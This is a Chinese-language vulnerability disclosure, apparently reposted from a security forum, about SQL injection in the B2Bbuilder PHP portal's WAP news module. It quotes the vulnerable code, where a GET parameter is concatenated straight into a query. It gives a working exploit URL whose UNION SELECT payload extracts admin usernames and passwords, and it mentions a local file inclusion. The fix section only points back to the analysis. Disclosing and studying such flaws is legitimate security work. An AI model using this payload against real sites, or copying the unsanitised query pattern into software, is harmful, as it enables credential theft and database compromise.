产品介绍: B2Bbuilder能为您提供一个高效、稳定和强大的B2B电子商务行业门户网站解决方案. 缺陷介绍: wap/index.php if (!empty($_GET["action"])) $action=$_GET["action"]; else $action="home"; //$action=empty($action)?"home":$_GET["action"]; //=============================== if(in_array($action, array('home','offer_cat','offer_list','offer_detail','product_cat','product_list','product_detail','news_cat','news_list','news_detail','corporate_cat','corporate_list','corporate_detail','search','corporate_moredetail','product_showimg'))) { require'inc/'.$action.'.php'; }news_cat.php文件 if(!empty($_GET['nid'])) { $nid=$_GET['nid']; $sql="select * from ".NEWSCAT." where pid=$nid"; $db->query($sql); $sre=$db->getRows(); if(count($sre)>0) { foreach($sre as $v) { echo "[资讯]<a href='?action=news_list&newsid=".$v['catid']."'>".$v['cat']."</a>"; } echo " <a href='?action=news_cat'><i>返回</i></a>"; //echo " <anchor>后退<prev/></anchor>"; } else { header("Location:./?action=news_list&nid=".$nid); exit(); } }随便一条错误的语句即可得到 数据库 前缀 测试: http://www.2cto.com /b2b/wap/index.php?action=news_cat&nid=17%20and%201=2%20uNion%20select%201,concat(0x7E217E21,user,0x3A,password,0x7E217E21),3,4,5,6,7,8%20FROM%20 数据库前缀_admin 本地包含。受限magic_quotes_gpc module/news/admin/newscat.php 修复: 见上述分析 作者:t00ls.net
查看更多关于B2Bbuilder php SQL inj - 网站安全 - 自学php的详细内容...